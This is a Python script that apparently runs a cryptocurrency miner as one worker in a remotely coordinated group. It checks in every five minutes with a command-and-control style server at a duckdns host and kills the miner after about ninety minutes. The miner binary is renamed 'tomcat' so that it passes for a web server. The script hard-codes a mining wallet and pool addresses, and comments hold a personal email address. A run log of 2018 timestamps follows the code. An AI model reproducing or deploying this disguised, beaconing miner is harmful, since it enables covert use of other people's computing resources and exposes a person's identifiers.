import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:20:07.060023
#2018-02-17 17:09:08.464125
#2018-02-17 18:57:04.102695
#2018-02-17 20:45:09.512814
#2018-02-17 22:32:05.279039
#2018-02-18 00:16:01.817449
#2018-02-18 02:06:06.745862
#2018-02-18 03:55:01.525235
#2018-02-18 05:42:01.412468
#2018-02-18 07:34:04.711038
#2018-02-18 09:22:07.283999
#2018-02-18 11:09:01.307356
#2018-02-18 12:56:03.548674
#2018-02-18 14:43:05.066023
#2018-02-18 16:34:01.555442
#2018-02-18 18:23:02.084585
#2018-02-18 20:08:06.069742
#2018-02-18 21:55:03.845874
#2018-02-18 23:44:02.091522
#2018-02-19 01:30:06.973564
#2018-02-19 03:18:07.180565
#2018-02-19 05:03:06.732402
#2018-02-19 06:52:07.107163
#2018-02-19 08:41:07.940573
#2018-02-19 10:30:09.597100
#2018-02-19 12:18:04.681867
#2018-02-19 14:05:08.526182
#2018-02-19 15:54:01.781489
#2018-02-19 17:42:01.761441
#2018-02-19 19:29:04.889055
#2018-02-19 21:16:07.457194
#2018-02-19 23:02:06.682719
#2018-02-20 00:47:07.437740
#2018-02-20 02:38:07.978162
#2018-02-20 04:28:05.697590
#2018-02-20 06:12:01.952200
#2018-02-20 07:57:03.895967
#2018-02-20 09:43:05.705468
#2018-02-20 11:27:06.276682
#2018-02-20 13:13:07.724986
#2018-02-20 14:59:07.281194
#2018-02-20 16:43:01.540499
#2018-02-20 18:31:09.621451
#2018-02-20 20:21:08.227511
#2018-02-20 22:06:08.264195
#2018-02-20 23:46:06.744800
#2018-02-21 01:32:06.349065
#2018-02-21 03:19:07.495881
#2018-02-21 05:06:06.831568
#2018-02-21 06:54:07.166636
#2018-02-21 08:41:04.335315
#2018-02-21 10:26:06.879442
#2018-02-21 12:13:06.347136
#2018-02-21 14:02:08.416156
#2018-02-21 15:47:07.390864
#2018-02-21 17:40:13.200591
#2018-02-21 19:27:07.244334
#2018-02-21 21:15:01.612947
#2018-02-21 23:01:05.469647
#2018-02-22 00:50:08.900720
#2018-02-22 02:38:07.863214
#2018-02-22 04:24:04.425766
#2018-02-22 06:10:07.185917
#2018-02-22 07:56:06.750203
#2018-02-22 09:44:06.909905
#2018-02-22 11:30:11.815224
#2018-02-22 13:18:01.759341
#2018-02-22 15:07:09.197332
#2018-02-22 16:52:04.754071
#2018-02-22 18:40:08.165864
#2018-02-22 20:31:07.462008
#2018-02-22 22:16:06.149248
#2018-02-23 00:03:07.861821
#2018-02-23 01:50:08.741690
#2018-02-23 03:38:05.177900
#2018-02-23 05:23:04.315916
#2018-02-23 07:08:08.276925
#2018-02-23 08:59:03.234221
#2018-02-23 11:17:01.914960
#2018-02-23 13:10:10.975342
#2018-02-23 14:54:08.421752
#2018-02-23 16:42:08.639545
#2018-02-23 18:28:01.542296
#2018-02-23 20:11:07.181779
#2018-02-23 22:01:06.986635
#2018-02-23 23:50:08.138328
#2018-02-24 01:41:05.151703
#2018-02-24 03:31:07.246887
#2018-02-24 05:16:08.778570
#2018-02-24 07:04:07.227742
#2018-02-24 08:51:06.293940
#2018-02-24 10:51:06.969002
#2018-02-24 12:39:03.856415
#2018-02-24 14:27:04.782839
#2018-02-24 16:15:08.091044
#2018-02-24 18:11:07.663949
#2018-02-24 19:57:07.441430
#2018-02-24 21:41:04.712279
#2018-02-25 00:34:07.366292
#2018-02-25 03:32:06.237566
#2018-02-25 07:18:05.709991